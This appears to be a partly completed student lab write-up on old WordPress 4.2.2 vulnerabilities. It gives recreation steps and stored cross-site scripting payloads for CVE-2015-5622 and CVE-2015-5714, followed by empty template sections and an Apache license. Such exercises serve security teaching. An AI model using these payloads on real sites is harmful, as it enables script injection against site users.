Time spent: 8 hours spent in total
Objective: Find, analyze, recreate, and document five vulnerabilities affecting an old version of WordPress
- (Required) Authenticated Stored Cross-Site Scripting (XSS) CVE ID: CVE-2015-5622
-
Summary:
- Vulnerability types: Cross-Site Scripting (XSS)
- Tested in version: 4.2.2
- Fixed in version: 4.2.3
-
Steps to recreate: Create a new post,
In text editor, type '<a href=/"[caption code=/">]</a><a title=/" onmouseover=alert(/'hacked/') /">link</a>', create post, view post and hover on link
-
Affected source code:
- (Required) Authenticated Shortcode Tags Cross-Site Scripting (XSS) or CVE-2015-5714
-
Summary:
- Vulnerability types: Cross-Site Scripting (XSS)
- Tested in version: 4.2.2
- Fixed in version: 4.3.1
-
Steps to recreate: Create new post,
In text editor, type 'TEST!!![caption width=/"1/" caption=/'<a href=/"/' /">]</a><a href=/"http:////onMouseOver=/'alert(1)/'/">Click me</a>', create post, view post and hover on link
- (Required) Vulnerability Name or ID
- Summary:
- Vulnerability types:
- Tested in version:
- Fixed in version:
- GIF Walkthrough:
- Steps to recreate:
- Affected source code:
- (Optional) Vulnerability Name or ID
- Summary:
- Vulnerability types:
- Tested in version:
- Fixed in version:
- GIF Walkthrough:
- Steps to recreate:
- Affected source code:
- (Optional) Vulnerability Name or ID
- Summary:
- Vulnerability types:
- Tested in version:
- Fixed in version:
- GIF Walkthrough:
- Steps to recreate:
- Affected source code:
List any additional assets, such as scripts or files
GIFs created with LiceCap.
Describe any challenges encountered while doing the work
Copyright [yyyy] [name of copyright owner]
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.